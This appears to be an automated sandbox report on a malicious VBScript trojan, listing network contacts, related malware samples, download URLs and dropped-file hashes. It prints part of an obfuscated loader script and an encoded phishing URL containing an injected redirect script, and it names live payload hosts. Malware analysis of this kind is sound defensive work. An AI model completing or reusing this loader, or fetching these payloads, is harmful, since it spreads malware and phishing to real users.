                http://app01.system.com.br/RDWeb/Pages/login.aspxwscript.exe, 00000001.00000003.1416337095.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1421534739.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422820927.000001FA64A02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1220909605.000001FA64A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422521039.000001FA64A50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1418152044.000001FA668C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1423146490.000001FA668E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221452637.000001FA668DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422756691.000001FA668B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422201829.000001FA64AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1425383596.000001FA668B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422616768.000001FA64A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221452637.000001FA668BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1422883330.000001FA64A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221215217.000001FA668B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1424739514.000001FA64A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1220848499.000001FA668C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1221152356.000001FA668DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1424717306.000001FA64A4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1418152044.000001FA668D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1424152267.000001FA668B5000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                162.159.130.233
                cdn.discordapp.comUnited States
                13335CLOUDFLARENETUSfalse
                188.114.97.3
                uploaddeimagens.com.brEuropean Union
                13335CLOUDFLARENETUStrue
                188.114.96.3
                paste.eeEuropean Union
                13335CLOUDFLARENETUStrue
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1446642
                Start date and time:2024-05-23 18:31:31 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 12s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:21
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.vbs
                Detection:MAL
                Classification:mal100.spre.troj.expl.evad.winVBS@6/10@3/3
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 1
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 1316 because it is empty
                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: file.vbs
                TimeTypeDescription
                12:32:39API Interceptor1x Sleep call for process: wscript.exe modified
                12:32:44API Interceptor56x Sleep call for process: powershell.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                162.159.130.233Cheat.Lab.2.7.2.msiGet hashmaliciousRedLine, zgRATBrowse
                • cdn.discordapp.com/attachments/1194585859404599367/1194585905420320788/2
                BpOyVCAP8g.msiGet hashmaliciousLummaC StealerBrowse
                • cdn.discordapp.com/attachments/1179749162376499230/1179749438646919228/9
                Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                • cdn.discordapp.com/attachments/1152164172566630421/1153181081793732809/Hioaeztcmim.exe
                PO Details.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • cdn.discordapp.com/attachments/956928735397965906/1011525020427763732/KqRRf17.jpb
                quote.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • cdn.discordapp.com/attachments/956928735397965906/1011024921868116099/ljkfuP193.ttf
                MSQNZmmg2F.exeGet hashmaliciousVidarBrowse
                • cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe
                b7cwlpwH6S.exeGet hashmaliciousAmadey RedLine SmokeLoaderBrowse
                • cdn.discordapp.com/attachments/878382243242983437/878684457245220884/mrmoms.exe
                order-confirmation.doc__.rtfGet hashmaliciousAgentTeslaBrowse
                • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                Order Confirmation.docGet hashmaliciousAgentTeslaBrowse
                • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                188.114.97.3WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
                http://hjkie5.pages.dev/Get hashmaliciousUnknownBrowse
                • hjkie5.pages.dev/
                56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                • qr-in.com/GDKZCby
                Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
                • qr-in.com/atBVKxq
                56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                • qr-in.com/GDKZCby
                file.exeGet hashmaliciousUnknownBrowse
                • wagner3.net/admin
                Product Listsd#U0334r#U0334o#U0334w#U0334..exeGet hashmaliciousFormBookBrowse
                • www.sba99prag.com/pshj/
                ORDIN.xlsGet hashmaliciousUnknownBrowse
                • qr-in.com/HDYwZbx
                ORDIN.xlsGet hashmaliciousUnknownBrowse
                • qr-in.com/HDYwZbx
                SSDQ115980924.exeGet hashmaliciousFormBookBrowse
                • www.ilodezu.com/z48v/
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                cdn.discordapp.comwindows.vbsGet hashmaliciousUnknownBrowse
                • 162.159.129.233
                http://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
                • 162.159.129.233
                Receipt #761.vbsGet hashmaliciousUnknownBrowse
                • 162.159.130.233
                SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                • 162.159.129.233
                SecuriteInfo.com.Win32.TrojanX-gen.8759.5386.exeGet hashmaliciousUnknownBrowse
                • 162.159.134.233
                SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                • 162.159.129.233
                SecuriteInfo.com.Win32.TrojanX-gen.8759.5386.exeGet hashmaliciousUnknownBrowse
                • 162.159.129.233
                file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                • 162.159.133.233
                https://s.net.vn/nAaaGet hashmaliciousUnknownBrowse
                • 162.159.135.233
                fx28wfnZ4J.exeGet hashmaliciousBabuk, Djvu, PrivateLoader, SmokeLoaderBrowse
                • 162.159.135.233
                paste.eewindows.vbsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                INVOICE.jsGet hashmaliciousAgentTeslaBrowse
                • 188.114.97.3
                Dados Do Hospede.ppamGet hashmaliciousNjratBrowse
                • 188.114.96.3
                Receipt #761.vbsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                Drwg.xlsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                PHARMACEUTICAL ORDER.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                Plat#U0103 Factura MTL11852.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                PON2401071.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                irlforme.docGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                PURCHASE ORDER_REQUEST.xla.xlsxGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                uploaddeimagens.com.brwindows.vbsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                INVOICE.jsGet hashmaliciousAgentTeslaBrowse
                • 188.114.97.3
                Receipt #761.vbsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                Plat#U0103 Factura MTL11852.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                Payment928263456.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 188.114.97.3
                PON2401071.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                irlforme.docGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                PURCHASE ORDER_REQUEST.xla.xlsxGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                PON2401071.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                vbs.zipGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSwindows.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 172.67.170.105
                file.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 172.67.170.105
                update.vbsGet hashmaliciousGuLoaderBrowse
                • 104.21.28.80
                time.vbsGet hashmaliciousGuLoaderBrowse
                • 172.67.170.105
                windows.vbsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                • 104.17.2.184
                http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
                • 188.114.96.3
                ELECTRONIC RECEIPT_Europait.htmlGet hashmaliciousHTMLPhisherBrowse
                • 104.17.2.184
                30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                • 104.26.12.205
                ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                CLOUDFLARENETUSwindows.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 172.67.170.105
                file.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 172.67.170.105
                update.vbsGet hashmaliciousGuLoaderBrowse
                • 104.21.28.80
                time.vbsGet hashmaliciousGuLoaderBrowse
                • 172.67.170.105
                windows.vbsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                • 104.17.2.184
                http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
                • 188.114.96.3
                ELECTRONIC RECEIPT_Europait.htmlGet hashmaliciousHTMLPhisherBrowse
                • 104.17.2.184
                30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                • 104.26.12.205
                ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                CLOUDFLARENETUSwindows.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 172.67.170.105
                file.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 172.67.170.105
                update.vbsGet hashmaliciousGuLoaderBrowse
                • 104.21.28.80
                time.vbsGet hashmaliciousGuLoaderBrowse
                • 172.67.170.105
                windows.vbsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                • 104.17.2.184
                http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
                • 188.114.96.3
                ELECTRONIC RECEIPT_Europait.htmlGet hashmaliciousHTMLPhisherBrowse
                • 104.17.2.184
                30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                • 104.26.12.205
                ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                • 172.67.74.152
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                3b5074b1b5d032e5620f69f9f700ff0ewindows.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 188.114.97.3
                • 162.159.130.233
                file.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 188.114.97.3
                • 162.159.130.233
                update.vbsGet hashmaliciousGuLoaderBrowse
                • 188.114.97.3
                • 162.159.130.233
                time.vbsGet hashmaliciousGuLoaderBrowse
                • 188.114.97.3
                • 162.159.130.233
                windows.vbsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                • 162.159.130.233
                https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                • 188.114.97.3
                • 162.159.130.233
                30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                • 188.114.97.3
                • 162.159.130.233
                ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                • 188.114.97.3
                • 162.159.130.233
                PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 188.114.97.3
                • 162.159.130.233
                phish_alert_sp2_2.0.0.0-214.emlGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                • 162.159.130.233
                37f463bf4616ecd445d4a1937da06e19windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 188.114.96.3
                file.vbsGet hashmaliciousGuLoader, XWormBrowse
                • 188.114.96.3
                update.vbsGet hashmaliciousGuLoaderBrowse
                • 188.114.96.3
                time.vbsGet hashmaliciousGuLoaderBrowse
                • 188.114.96.3
                windows.vbsGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 188.114.96.3
                doc023571961504.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                • 188.114.96.3
                Clear.7zGet hashmaliciousUnknownBrowse
                • 188.114.96.3
                SwiftCopy_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 188.114.96.3
                ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 188.114.96.3
                No context
                Process:C:\Windows\System32\wscript.exe
                File Type:Unicode text, UTF-8 text, with very long lines (12211), with CRLF line terminators
                Category:dropped
                Size (bytes):14203
                Entropy (8bit):4.682218058346265
                Encrypted:false
                SSDEEP:384:iXvXkJV4nM8MyIwk6uVd+mmrGKOv3BMP/H+F4RZ+VpPgRcVNqb1TIWXXZugDmQ6K:TVg1fIwwVg1rG1v3BMP2WyVLwFmZQ6p8
                MD5:3417529B6B5202753D16E6B3E841D7D1
                SHA1:F66B567CE48DC890B8526AC07D43AC00BC04D8CC
                SHA-256:FEA8F5981BC1E881D61C47B756D676F29727C75CB40C9209DCE012C1D7B4E3C2
                SHA-512:3B9EDE9F3D67BEC5C721CE7A6E279F84D85900807E975DD76822636DDA27FCC0A79C00D22F9570A34FA2902DE1995BD2D8F7F5AEBD904F75951B23D3A53BC4A8
                Malicious:false
                Reputation:low
                Preview:.. dim mudador , taurim , aligulado , enjaular , linguete , Cama , linguete1.. taurim = " ".. aligulado = "" & enjaular & taurim & enjaular & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & enjaular & taurim & enjaular & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & enjaular & taurim & enjaular & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & enjaular & taurim & enjaular & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & enjaular & taurim & enjaular & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & enjaular & taurim & enjaular & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & enjaular & taurim & enjaular & "DgTre
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):9434
                Entropy (8bit):4.928515784730612
                Encrypted:false
                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                MD5:D3594118838EF8580975DDA877E44DEB
                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                Malicious:false
                Reputation:low
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:Nlllulf66llp:NllUSOl
                MD5:B798C92691636A7830BE142C313C0E72
                SHA1:53C2A97D145573705355A8C39757DB8009D116CC
                SHA-256:5D6C0E321D148D9CD398B4261686BA6344F9FFF6FB4226AF1C8AEE4FB89DC75F
                SHA-512:6198106131F8C8083DA7946BADE71A6BB3A37474DC81E699976680CD3ACC1E84B8A151F7F8D15A79C1343BB108992D44CB98FE78593F55CE891B669EB6022106
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:@...e................................................@..........
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Reputation:high, very likely benign file
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\wscript.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):3.6311534414266404
                Encrypted:false
                SSDEEP:3:GlDTlDX55I2Y1AnLWulLn:GlDpsGXLn
                MD5:3739180F7415520A7E11386E89F64571
                SHA1:AAFAA5C11C248D0F2B1BBA32AAE186782F9C8525
                SHA-256:229F81FEBDEB4E912E223214D2FE0494F09418F5302977B4F5EC53706AB40A3E
                SHA-512:1F8472A9720098F940B96DDB14E02268DFF1172176C0832D5B2F86AC8C3A2655941C0C51E7C4B135A0B273D8934F18595EEA8F0109A08B8FA3424F0846AE16EA
                Malicious:false
                Preview:....4.0.5.4.6.4.....\MAILSLOT\NET\GETDCF7F83640.................
                Process:C:\Windows\System32\wscript.exe
                File Type:GLS_BINARY_LSB_FIRST
                Category:dropped
                Size (bytes):160
                Entropy (8bit):4.438743916256937
                Encrypted:false
                SSDEEP:3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
                MD5:E467C82627F5E1524FDB4415AF19FC73
                SHA1:B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
                SHA-256:116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
                SHA-512:2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
                Malicious:false
                Preview:................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............
                Process:C:\Windows\System32\wscript.exe
                File Type:GLS_BINARY_LSB_FIRST
                Category:dropped
                Size (bytes):160
                Entropy (8bit):4.577654635909331
                Encrypted:false
                SSDEEP:3:rmHfvtH//Sy3yeM1y73yeUUGk+l91F3ye0Zty:rmHcy3HL73HNGFlXF3HIty
                MD5:86EFD27334586B592E7BFBD0E143C450
                SHA1:E8D1FF64BB20235FD4AF6D8051A4CD4A19B91BDE
                SHA-256:4AA9CA41BA628CDB8E337FCD8929F6BD8D68997E120A8C925BFA1C311AD7DFB4
                SHA-512:3FA13E0456C17D061B40F512CD5615F0B46F82E2095F82C0EB4D1D3E8DAF1ECE475028EB77C78C0FF91E034B745F3FD3C1F0C5AE87FBAEB69F67B1C69F547048
                Malicious:false
                Preview:...................................k...6.3F..~4Z.....]..........+.H`...........k...6.3F..~4Z....3.qq..7I......6...........k...6.3F..~4Z....,..l..@E............
                File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Entropy (8bit):3.417858401826445
                TrID:
                • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                • MP3 audio (1001/1) 32.22%
                • Lumena CEL bitmap (63/63) 2.03%
                • Corel Photo Paint (41/41) 1.32%
                File name:file.vbs
                File size:62'478 bytes
                MD5:a96d75d4c749261992415e1d391a0136
                SHA1:6751edf6ff40d11d8244b357dd1bdd3dfd2ff6ce
                SHA256:c405b1d1c722ca217decbe4e31d2a5e760cb77a8a9731690a96e810a0db45e1c
                SHA512:fab82ccfd5d761ddd4c82283ac8f9b8a812fc2408fd3eb6dd1aba815d65d59ba244696351f56053535ce2c7e6370509e2255062efe6234960502634e983dbd2b
                SSDEEP:384:FZAaML0EfbeyGnpM8pBIRpuWkH6jM1L7Kc0ZaEXJg:7x5i8pBIRgWkHq9ZpZg
                TLSH:9C536A526BEA2108B5F7BA48997A41344F37B9C5AD7DC94E05CC291D0BF3E84CC60BA7
